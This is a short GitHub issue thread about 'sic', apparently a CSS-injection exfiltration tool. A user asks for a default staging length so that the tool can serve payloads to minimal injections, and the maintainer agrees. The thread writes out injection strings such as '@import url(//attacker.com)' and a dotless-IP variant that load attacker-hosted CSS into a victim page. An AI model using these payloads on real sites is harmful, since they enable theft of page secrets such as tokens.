sic icon indicating copy to clipboard operation
sic copied to clipboard
verified publisher icon d0nutptr

Payload response for /

Open nbk2000 opened this issue 6 years ago • 1 comments

Hey d0nut, here's another enhancement request.

Since we're specifying charset on the command line, why not also allow specifying a default staging len value. This way if no path is specified, a targeted payload could still be delivered.

For example if we could only inject (assuming protocol relative url support): @import url(//attacker.com) Then a payload could be generated using whatever len argument was specified via the command line (a sensible default, like 12 could be assumed if none is provided via URL or CLI).

This would have the advantage of limiting the characters required for successful injection to only ().a-z/ . This could be reduced further to just ()0-9/ using dotless IP to just:

@import url(//16843009)

Wouldn't that be cool?

nbk2000 avatar Apr 23 '19 06:04 nbk2000

Yup! Seems reasonable to make / also respond just like /staging?len=<default>

d0nutptr avatar Apr 23 '19 06:04 d0nutptr